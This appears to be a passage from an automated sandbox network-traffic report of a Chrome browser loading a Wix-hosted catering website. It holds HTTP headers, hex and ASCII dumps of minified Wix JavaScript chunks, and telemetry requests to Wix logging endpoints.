                                                                                                                                                                                                                        2025-01-10 13:52:39 UTC1390INData Raw: 6e 73 74 20 72 3d 65 2e 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 75 29 2c 6f 3d 74 3f 41 72 72 61 79 2e 66 72 6f 6d 28 65 2e 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 6e 28 74 29 29 29 3a 5b 5d 3b 72 2e 66 6f 72 45 61 63 68 28 28 65 3d 3e 7b 6f 2e 73 6f 6d 65 28 28 74 3d 3e 74 2e 63 6f 6e 74 61 69 6e 73 28 65 29 29 29 7c 7c 61 28 65 29 7d 29 29 7d 63 28 29 2e 6d 65 61 73 75 72 65 28 28 28 29 3d 3e 7b 72 28 29 7d 29 29 7d 28 74 29 29 7d 2c 61 3d 65 3d 3e 7b 63 6f 6e 73 74 20 72 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 70 29 7c 7c 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 74 61 62 69 6e 64 65 78 22 29 3b 63 28 29 2e 6d 75 74 61 74 65 28 28 28 29 3d 3e 7b 65 2e 73 65 74 41
                                                                                                                                                                                                                        Data Ascii: nst r=e.document.querySelectorAll(u),o=t?Array.from(e.document.querySelectorAll(n(t))):[];r.forEach((e=>{o.some((t=>t.contains(e)))||a(e)}))}c().measure((()=>{r()}))}(t))},a=e=>{const r=e.getAttribute(p)||e.getAttribute("tabindex");c().mutate((()=>{e.setA
                                                                                                                                                                                                                        2025-01-10 13:52:39 UTC1390INData Raw: 2c 22 43 6f 6c 75 6d 6e 22 2c 22 43 6c 61 73 73 69 63 53 65 63 74 69 6f 6e 22 2c 22 53 6c 69 64 65 53 68 6f 77 53 6c 69 64 65 22 2c 22 50 61 67 65 42 61 63 6b 67 72 6f 75 6e 64 22 2c 22 48 6f 76 65 72 42 6f 78 22 2c 22 53 65 63 74 69 6f 6e 22 2c 22 48 65 61 64 65 72 53 65 63 74 69 6f 6e 22 2c 22 46 6f 6f 74 65 72 53 65 63 74 69 6f 6e 22 2c 22 4c 69 6e 6b 42 61 72 22 2c 22 54 65 78 74 4d 61 73 6b 22 2c 22 4d 61 74 72 69 78 47 61 6c 6c 65 72 79 22 2c 22 50 61 67 69 6e 61 74 65 64 47 72 69 64 47 61 6c 6c 65 72 79 22 2c 22 53 6c 69 64 65 72 47 61 6c 6c 65 72 79 22 2c 22 53 6c 69 64 65 53 68 6f 77 47 61 6c 6c 65 72 79 22 5d 2c 6c 3d 28 65 2c 7b 62 61 73 65 4d 65 64 69 61 55 72 6c 3a 74 2c 69 73 53 45 4f 42 6f 74 3a 72 7d 29 3d 3e 7b 63 6f 6e 73 74 20 6e 3d 2f
                                                                                                                                                                                                                        Data Ascii: ,"Column","ClassicSection","SlideShowSlide","PageBackground","HoverBox","Section","HeaderSection","FooterSection","LinkBar","TextMask","MatrixGallery","PaginatedGridGallery","SliderGallery","SlideShowGallery"],l=(e,{baseMediaUrl:t,isSEOBot:r})=>{const n=/
                                                                                                                                                                                                                        2025-01-10 13:52:39 UTC1390INData Raw: 65 55 72 69 43 6f 6d 70 6f 6e 65 6e 74 49 66 45 6e 63 6f 64 65 64 3a 28 29 3d 3e 57 2e 76 50 2c 67 65 74 52 65 6c 61 74 69 76 65 55 72 6c 3a 28 29 3d 3e 57 2e 71 71 2c 67 65 74 55 72 6c 48 61 73 68 3a 28 29 3d 3e 55 2e 4d 24 2c 6b 65 65 70 49 6e 74 65 72 6e 61 6c 51 75 65 72 79 50 61 72 61 6d 73 4f 6e 6c 79 3a 28 29 3d 3e 79 2e 52 2c 72 65 6d 6f 76 65 50 72 6f 74 6f 63 6f 6c 3a 28 29 3d 3e 55 2e 62 35 2c 72 65 6d 6f 76 65 51 75 65 72 79 50 61 72 61 6d 73 3a 28 29 3d 3e 55 2e 62 37 2c 72 65 6d 6f 76 65 55 72 6c 48 61 73 68 3a 28 29 3d 3e 55 2e 4b 33 2c 72 65 70 6c 61 63 65 50 72 6f 74 6f 63 6f 6c 3a 28 29 3d 3e 55 2e 72 77 2c 72 65 73 6f 6c 76 65 55 72 6c 3a 28 29 3d 3e 79 2e 4f 2c 73 69 74 65 3a 28 29 3d 3e 72 65 7d 29 3b 76 61 72 20 6e 3d 72 28 37 31 30
                                                                                                                                                                                                                        Data Ascii: eUriComponentIfEncoded:()=>W.vP,getRelativeUrl:()=>W.qq,getUrlHash:()=>U.M$,keepInternalQueryParamsOnly:()=>y.R,removeProtocol:()=>U.b5,removeQueryParams:()=>U.b7,removeUrlHash:()=>U.K3,replaceProtocol:()=>U.rw,resolveUrl:()=>y.O,site:()=>re});var n=r(710
                                                                                                                                                                                                                        2025-01-10 13:52:39 UTC1390INData Raw: 70 61 53 65 63 74 69 6f 6e 50 61 67 65 49 64 73 29 7d 2c 24 3d 61 73 79 6e 63 28 65 2c 74 29 3d 3e 7b 61 77 61 69 74 28 30 2c 62 2e 4a 29 28 29 2c 4f 2e 75 70 64 61 74 65 43 75 72 72 65 6e 74 52 6f 75 74 65 49 6e 66 6f 28 65 29 2c 41 2e 70 75 73 68 55 72 6c 53 74 61 74 65 28 65 2e 70 61 72 73 65 64 55 72 6c 2c 74 29 3b 63 6f 6e 73 74 7b 63 6f 6e 74 65 78 74 49 64 3a 6f 2c 70 61 67 65 49 64 3a 61 7d 3d 65 3b 69 66 28 61 77 61 69 74 20 52 28 7b 70 61 67 65 49 64 3a 61 2c 63 6f 6e 74 65 78 74 49 64 3a 6f 7d 29 2c 73 2e 69 73 46 69 72 73 74 4e 61 76 69 67 61 74 69 6f 6e 28 29 29 7b 63 6f 6e 73 74 20 65 3d 21 31 3b 65 26 26 45 2e 70 68 61 73 65 53 74 61 72 74 65 64 28 63 2e 63 2e 41 50 50 5f 57 49 4c 4c 5f 52 45 4e 44 45 52 5f 46 49 52 53 54 5f 50 41 47 45 29
                                                                                                                                                                                                                        Data Ascii: paSectionPageIds)},$=async(e,t)=>{await(0,b.J)(),O.updateCurrentRouteInfo(e),A.pushUrlState(e.parsedUrl,t);const{contextId:o,pageId:a}=e;if(await R({pageId:a,contextId:o}),s.isFirstNavigation()){const e=!1;e&&E.phaseStarted(c.c.APP_WILL_RENDER_FIRST_PAGE)
                                                                                                                                                                                                                        2025-01-10 13:52:39 UTC1390INData Raw: 74 75 72 6e 20 46 3c 34 3f 28 46 2b 2b 2c 49 28 79 2c 43 2c 75 2e 77 34 2e 44 59 4e 41 4d 49 43 5f 52 45 44 49 52 45 43 54 2c 57 2c 45 2c 76 2e 67 65 74 50 61 67 65 4e 75 6d 62 65 72 28 29 29 2c 48 28 43 2e 72 65 64 69 72 65 63 74 55 72 6c 29 29 3a 28 46 3d 30 2c 49 28 79 2c 43 2c 75 2e 77 34 2e 44 59 4e 41 4d 49 43 5f 52 45 44 49 52 45 43 54 2c 57 2c 45 2c 76 2e 67 65 74 50 61 67 65 4e 75 6d 62 65 72 28 29 29 2c 21 31 29 3b 69 66 28 46 3d 30 2c 43 3d 43 26 26 61 77 61 69 74 20 70 2e 68 61 6e 64 6c 65 28 43 29 2c 43 3d 43 26 26 61 77 61 69 74 20 6c 2e 68 61 6e 64 6c 65 28 43 29 2c 43 3d 43 26 26 61 77 61 69 74 20 66 2e 68 61 6e 64 6c 65 28 43 29 2c 43 3d 43 26 26 61 77 61 69 74 20 68 2e 68 61 6e 64 6c 65 28 43 29 2c 21 43 29 72 65 74 75 72 6e 20 49 28 79
                                                                                                                                                                                                                        Data Ascii: turn F<4?(F++,I(y,C,u.w4.DYNAMIC_REDIRECT,W,E,v.getPageNumber()),H(C.redirectUrl)):(F=0,I(y,C,u.w4.DYNAMIC_REDIRECT,W,E,v.getPageNumber()),!1);if(F=0,C=C&&await p.handle(C),C=C&&await l.handle(C),C=C&&await f.handle(C),C=C&&await h.handle(C),!C)return I(y


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        53192.168.2.54977934.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:52:39 UTC404OUTGET /services/wix-thunderbolt/dist/router.478f8b95.chunk.min.js HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:52:40 UTC1162INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 1303
                                                                                                                                                                                                                        X-Amz-Replication-Status: COMPLETED
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Amz-Version-Id: dBKbad6dybnZMLw95870eCyKyUWt9Vrp
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Varnish: 639591914 941554969
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0),1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: false
                                                                                                                                                                                                                        X-Varnish: 965699438
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVc75LqHKURxvujjeddHLBCHZn+PxHDBkh4V2x50EyEnEQ
                                                                                                                                                                                                                        X-Cluster-Node-Role: proxy
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Date: Tue, 07 Jan 2025 09:43:27 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 274153
                                                                                                                                                                                                                        Last-Modified: Tue, 07 Jan 2025 09:35:11 GMT
                                                                                                                                                                                                                        ETag: "2a76b438980c3b70ff11f9c7903fb226"
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-12baf686
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:52:40 UTC228INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 31 34 38 2c 35 36 35 32 2c 36 35 32 31 5d 2c 7b 31 39 30 32 35 3a 28 74 2c 65 2c 6e 29 3d 3e 7b 6e 2e 64 28 65 2c 7b 4c 6d 3a 28 29 3d 3e 72 2c 4d 79 3a 28 29 3d 3e 77 2c 4f 67 3a 28 29 3d 3e 63 2c 51 4a 3a 28 29 3d 3e 68 2c 51 78 3a 28 29 3d 3e 76 2c 56 38 3a 28 29 3d 3e 5f 2c 5f 64 3a 28 29 3d 3e 6f 2c 61 6b 3a 28 29 3d 3e 61 2c 69 69 3a 28 29 3d 3e 69 2c 6c 44 3a
                                                                                                                                                                                                                        Data Ascii: "use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[5148,5652,6521],{19025:(t,e,n)=>{n.d(e,{Lm:()=>r,My:()=>w,Og:()=>c,QJ:()=>h,Qx:()=>v,V8:()=>_,_d:()=>o,ak:()=>a,ii:()=>i,lD:
                                                                                                                                                                                                                        2025-01-10 13:52:40 UTC1075INData Raw: 28 29 3d 3e 73 2c 6c 48 3a 28 29 3d 3e 64 2c 72 45 3a 28 29 3d 3e 6d 2c 76 68 3a 28 29 3d 3e 75 7d 29 3b 63 6f 6e 73 74 20 73 3d 2f 6d 61 69 6c 74 6f 3a 28 5b 5e 3f 5d 2b 29 28 5c 3f 28 2e 2a 29 29 3f 2f 2c 72 3d 2f 5e 74 65 6c 3a 28 2e 2a 29 2f 2c 61 3d 2f 5e 5c 2f 28 5b 5e 20 3f 23 5d 2a 29 3f 5b 23 5d 3f 28 5b 5e 20 3f 23 5d 2a 29 5b 3f 5d 3f 28 2e 2a 29 2f 2c 70 3d 2f 5e 23 28 5b 5e 20 3f 5d 2a 29 5b 3f 5d 3f 28 2e 2a 29 2f 2c 6c 3d 2f 5e 28 68 74 74 70 7c 68 74 74 70 73 29 3a 5c 2f 5c 2f 28 2e 2a 29 2f 2c 6f 3d 2f 5e 77 69 78 3a 64 6f 63 75 6d 65 6e 74 3a 5c 2f 5c 2f 76 31 5c 2f 28 2e 2b 29 5c 2f 28 2e 2b 29 2f 2c 63 3d 2f 5e 64 6f 63 75 6d 65 6e 74 3a 5c 2f 5c 2f 28 2e 2a 29 2f 2c 69 3d 74 3d 3e 72 2e 74 65 73 74 28 74 29 2c 64 3d 74 3d 3e 74 2e 73
                                                                                                                                                                                                                        Data Ascii: ()=>s,lH:()=>d,rE:()=>m,vh:()=>u});const s=/mailto:([^?]+)(\?(.*))?/,r=/^tel:(.*)/,a=/^\/([^ ?#]*)?[#]?([^ ?#]*)[?]?(.*)/,p=/^#([^ ?]*)[?]?(.*)/,l=/^(http|https):\/\/(.*)/,o=/^wix:document:\/\/v1\/(.+)\/(.+)/,c=/^document:\/\/(.*)/,i=t=>r.test(t),d=t=>t.s


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        54192.168.2.54978034.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:52:40 UTC404OUTGET /services/wix-thunderbolt/dist/stores.22153ee9.chunk.min.js HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:52:40 UTC1162INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 4443
                                                                                                                                                                                                                        X-Amz-Replication-Status: COMPLETED
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Amz-Version-Id: IX3.iNthTHn62Kw4ROLPAr_GMFvU_Cx3
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Varnish: 977275663 941854636
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0),1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: false
                                                                                                                                                                                                                        X-Varnish: 264337940
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVc5jtBSNVBClNnNc015G4PmlZXoVxLpWMsBL92iJ2slGH
                                                                                                                                                                                                                        X-Cluster-Node-Role: proxy
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Date: Tue, 07 Jan 2025 09:43:27 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 274153
                                                                                                                                                                                                                        Last-Modified: Tue, 07 Jan 2025 09:35:11 GMT
                                                                                                                                                                                                                        ETag: "250ac9233a06b0e05efe967bd623d58c"
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-12baf686
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:52:40 UTC228INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 32 32 31 5d 2c 7b 38 39 36 34 38 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6e 2e 64 28 74 2c 7b 45 24 3a 28 29 3d 3e 41 2c 5f 33 3a 28 29 3d 3e 67 2c 50 32 3a 28 29 3d 3e 62 7d 29 3b 63 6c 61 73 73 20 72 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 29 7b 74 68 69 73 2e 65 6e 71 75 65 75 65 49 6e 64 65 78 3d 30 2c 74 68 69 73 2e 64 65 71 75 65 75 65 49 6e 64 65 78 3d 30 2c 74 68
                                                                                                                                                                                                                        Data Ascii: "use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[5221],{89648:(e,t,n)=>{n.d(t,{E$:()=>A,_3:()=>g,P2:()=>b});class r{constructor(e){this.enqueueIndex=0,this.dequeueIndex=0,th
                                                                                                                                                                                                                        2025-01-10 13:52:40 UTC1390INData Raw: 69 73 2e 69 6e 69 74 69 61 6c 51 75 65 75 65 53 69 7a 65 3d 30 2c 74 68 69 73 2e 71 75 65 75 65 3d 6e 65 77 20 41 72 72 61 79 28 65 29 2c 74 68 69 73 2e 69 6e 69 74 69 61 6c 51 75 65 75 65 53 69 7a 65 3d 65 7d 65 6e 71 75 65 75 65 28 65 29 7b 74 68 69 73 2e 65 6e 71 75 65 75 65 49 6e 64 65 78 3c 74 68 69 73 2e 69 6e 69 74 69 61 6c 51 75 65 75 65 53 69 7a 65 3f 74 68 69 73 2e 71 75 65 75 65 5b 74 68 69 73 2e 65 6e 71 75 65 75 65 49 6e 64 65 78 2b 2b 5d 3d 65 3a 2b 2b 74 68 69 73 2e 65 6e 71 75 65 75 65 49 6e 64 65 78 26 26 74 68 69 73 2e 71 75 65 75 65 2e 70 75 73 68 28 65 29 7d 64 65 71 75 65 75 65 28 29 7b 63 6f 6e 73 74 20 65 3d 74 68 69 73 2e 71 75 65 75 65 5b 74 68 69 73 2e 64 65 71 75 65 75 65 49 6e 64 65 78 2b 2b 5d 3b 72 65 74 75 72 6e 20 74 68 69
                                                                                                                                                                                                                        Data Ascii: is.initialQueueSize=0,this.queue=new Array(e),this.initialQueueSize=e}enqueue(e){this.enqueueIndex<this.initialQueueSize?this.queue[this.enqueueIndex++]=e:++this.enqueueIndex&&this.queue.push(e)}dequeue(){const e=this.queue[this.dequeueIndex++];return thi
                                                                                                                                                                                                                        2025-01-10 13:52:40 UTC1390INData Raw: 2c 5b 5d 29 2c 21 31 29 3a 78 28 65 29 3f 28 6e 3d 6e 7c 7c 7b 7d 2c 64 28 6e 2c 74 2c 65 29 2c 21 30 29 3a 76 6f 69 64 20 30 29 2c 73 29 2c 6e 7d 3b 63 6c 61 73 73 20 79 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 29 7b 74 68 69 73 2e 64 65 70 65 6e 64 65 6e 63 79 49 6e 64 65 78 3d 65 2c 74 68 69 73 2e 73 63 68 65 6d 61 73 3d 7b 7d 7d 61 64 64 53 63 68 65 6d 61 54 6f 49 6e 64 65 78 28 65 2c 74 29 7b 70 28 65 2c 28 65 3d 3e 7b 69 66 28 78 28 65 29 29 72 65 74 75 72 6e 20 74 68 69 73 2e 64 65 70 65 6e 64 65 6e 63 79 49 6e 64 65 78 2e 61 64 64 52 65 66 54 6f 49 6e 64 65 78 28 65 2c 74 29 2c 21 30 7d 29 2c 73 29 7d 72 65 6d 6f 76 65 53 63 68 65 6d 61 46 72 6f 6d 49 6e 64 65 78 28 65 2c 74 29 7b 65 21 3d 3d 69 26 26 70 28 65 2c 28 65 3d 3e 74 68 69 73 2e 64 65
                                                                                                                                                                                                                        Data Ascii: ,[]),!1):x(e)?(n=n||{},d(n,t,e),!0):void 0),s),n};class y{constructor(e){this.dependencyIndex=e,this.schemas={}}addSchemaToIndex(e,t){p(e,(e=>{if(x(e))return this.dependencyIndex.addRefToIndex(e,t),!0}),s)}removeSchemaFromIndex(e,t){e!==i&&p(e,(e=>this.de
                                                                                                                                                                                                                        2025-01-10 13:52:40 UTC1390INData Raw: 6f 49 6e 64 65 78 28 6f 2c 75 29 3b 6c 65 74 20 76 3b 70 28 68 2c 28 65 3d 3e 63 2e 72 65 6d 6f 76 65 52 65 66 46 72 6f 6d 49 6e 64 65 78 28 65 2c 75 29 29 2c 73 29 2c 70 28 6f 2c 28 28 65 2c 74 29 3d 3e 7b 69 66 28 78 28 65 29 29 72 65 74 75 72 6e 20 76 3d 76 7c 7c 68 7c 7c 7b 7d 2c 64 28 76 2c 74 2c 65 29 2c 63 2e 61 64 64 52 65 66 54 6f 49 6e 64 65 78 28 65 2c 75 29 2c 21 30 7d 29 2c 73 29 2c 28 76 7c 7c 68 29 26 26 6c 28 72 2c 65 2c 74 2c 6e 2c 76 7c 7c 7b 7d 29 7d 2c 67 3d 28 66 3d 28 65 3d 3e 65 28 29 29 29 3d 3e 7b 63 6f 6e 73 74 20 78 3d 66 28 28 28 29 3d 3e 28 28 6f 2c 66 3d 28 65 3d 3e 65 28 29 29 29 3d 3e 7b 63 6f 6e 73 74 20 78 3d 66 28 28 28 29 3d 3e 6d 3f 6f 3a 63 2e 67 65 74 41 6c 6c 49 6e 76 61 6c 69 64 61 74 69 6f 6e 73 28 6f 29 29 2c 22
                                                                                                                                                                                                                        Data Ascii: oIndex(o,u);let v;p(h,(e=>c.removeRefFromIndex(e,u)),s),p(o,((e,t)=>{if(x(e))return v=v||h||{},d(v,t,e),c.addRefToIndex(e,u),!0}),s),(v||h)&&l(r,e,t,n,v||{})},g=(f=(e=>e()))=>{const x=f((()=>((o,f=(e=>e()))=>{const x=f((()=>m?o:c.getAllInvalidations(o)),"
                                                                                                                                                                                                                        2025-01-10 13:52:40 UTC45INData Raw: 64 65 72 62 6f 6c 74 2f 64 69 73 74 2f 73 74 6f 72 65 73 2e 32 32 31 35 33 65 65 39 2e 63 68 75 6e 6b 2e 6d 69 6e 2e 6a 73 2e 6d 61 70
                                                                                                                                                                                                                        Data Ascii: derbolt/dist/stores.22153ee9.chunk.min.js.map


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        55192.168.2.5497883.234.186.1414435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:52:40 UTC638OUTPOST /bolt-performance HTTP/1.1
                                                                                                                                                                                                                        Host: frog.wix.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Content-Length: 1049
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:52:40 UTC1049OUTData Raw: 7b 22 64 74 22 3a 31 38 37 39 2c 22 65 22 3a 5b 7b 22 64 74 22 3a 31 35 36 36 2c 22 66 22 3a 7b 22 74 73 22 3a 33 37 36 32 2c 22 74 73 6e 22 3a 35 33 30 34 2c 22 70 76 22 3a 74 72 75 65 2c 22 5f 62 72 61 6e 64 49 64 22 3a 22 77 69 78 22 2c 22 5f 6d 73 22 3a 35 33 30 35 2c 22 5f 68 6f 73 74 69 6e 67 50 6c 61 74 66 6f 72 6d 22 3a 22 56 49 45 57 45 52 22 2c 22 61 70 70 4e 61 6d 65 22 3a 22 74 68 75 6e 64 65 72 62 6f 6c 74 22 2c 22 63 6f 72 72 49 64 22 3a 22 39 30 31 39 35 34 35 61 2d 37 63 65 66 2d 34 32 64 30 2d 62 31 35 61 2d 37 65 36 61 38 62 62 64 66 38 31 39 22 2c 22 69 73 5f 72 6f 6c 6c 6f 75 74 22 3a 31 2c 22 69 73 53 75 63 63 65 73 73 66 75 6c 53 53 52 22 3a 74 72 75 65 2c 22 6e 61 6d 65 22 3a 22 73 73 72 49 6e 74 65 72 6e 61 6c 43 61 63 68 65 2d 68
                                                                                                                                                                                                                        Data Ascii: {"dt":1879,"e":[{"dt":1566,"f":{"ts":3762,"tsn":5304,"pv":true,"_brandId":"wix","_ms":5305,"_hostingPlatform":"VIEWER","appName":"thunderbolt","corrId":"9019545a-7cef-42d0-b15a-7e6a8bbdf819","is_rollout":1,"isSuccessfulSSR":true,"name":"ssrInternalCache-h
                                                                                                                                                                                                                        2025-01-10 13:52:40 UTC388INHTTP/1.1 204 No Content
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 13:52:40 GMT
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Access-Control-Allow-Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: Accept,Authorization,Cache-Control,Content-Type,DNT,If-Modified-Since,Keep-Alive,Origin,User-Agent,X-Requested-With


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        56192.168.2.54978734.149.206.2554435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:52:40 UTC642OUTPOST /api/v1/bulklog HTTP/1.1
                                                                                                                                                                                                                        Host: panorama.wixapps.net
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Content-Length: 10688
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
